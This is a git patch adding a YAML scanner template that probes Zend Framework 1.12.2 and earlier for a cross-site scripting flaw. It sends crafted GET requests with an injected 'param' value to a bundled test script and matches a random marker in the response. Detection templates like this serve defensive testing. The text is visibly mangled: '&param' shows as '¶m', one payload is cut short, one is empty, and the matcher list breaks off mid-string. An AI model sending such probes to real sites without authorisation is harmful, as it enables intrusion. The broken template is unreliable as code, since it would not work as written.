From 84a48a61ad8c213f2f5afc7f8243847dca037bad Mon Sep 17 00:00:00 2001 From: Celesian Date: Tue, 6 Dec 2022 05:13:46 -0300 Subject: [PATCH] added XSS for ZendFramework1 --- vulnerabilities/zend/zend-v1-xss.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/zend/zend-v1-xss.yaml diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml new file mode 100644 index 0000000000..788745b62a --- /dev/null +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -0,0 +1,39 @@ +id: zend-v1-xss + +info: + name: ZendFramework 1.12.2 - Cross-Site Scripting + author: c3l3si4n + severity: medium + description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. + reference: + - https://twitter.com/c3l3si4n/status/1600035722148212737 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: zend,zendframework,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=%20a='{{randstr}}'>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{randstr}}' + - '